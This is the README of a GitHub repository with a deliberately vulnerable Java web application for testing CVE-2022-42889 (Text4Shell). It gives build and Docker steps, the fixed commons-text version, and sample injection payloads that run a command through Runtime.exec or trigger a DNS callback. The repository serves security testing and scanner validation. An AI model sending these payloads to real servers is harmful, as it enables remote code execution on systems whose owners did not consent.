Skip to content

securekomodo/text4shell-poc

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2022-42889 PoC Test Application

This is a vulnerable application developed as a Proof of Concept for the vulnerability CVE-2022-42889.

Maven Installation

In order to run this you will need:

  • JDK 17 or above
  • Maven
  1. Clone the git repo
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Maven install to create the JAR
mvn clean install

This will create the ./target folder and within that folder should be the JAR file text4shell-poc-0.0.1-SNAPSHOT.jar

  1. Start the webserver
java -jar ./target/text4shell-poc-0.0.1-SNAPSHOT.jar

This will start a web server on your localhost listening on port 8080 by default

  1. Browse to the webserver

Access the webserver at http://localhost:8080/ and you should see the following output

Text4Shell POC Test -@securekomodo
Send payloads to /reflected?poc=yourpayload
OR Send payloads to /blind with payload as your userAgent
  1. Exploit manually or perform a scan using text4shell-scan

Sample Exploit Payloads

${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/itworked')}
${dns:<burp collaborator host>)}

Recommended URL encoder for successful exploit demonstration: https://www.urlencoder.org/.

Docker

Alternatively you can use Docker to be able to run this PoC:

  1. Clone the git repo
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Docker build
docker build --tag=text4shell-poc .
  1. Docker run
docker run -p 80:8080 text4shell-poc
  1. Test the vulnerable app
http://localhost/
  1. Attack can be performed by passing a string “${prefix:name}” like shown below:
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
${dns:<burp collaborator host>)}

Recommended URL encoder for successful exploit demonstration: https://www.urlencoder.org/.

Alternatively you can validate the effectiveness of scanning tools such as text4shell-scan

Are You Vulnerable?

In order for your code to be vulnerable you need to:

The Fix

The fix for this is to update your instances of commons-text to versions 1.10.0 or later.

Author

Bryan Smith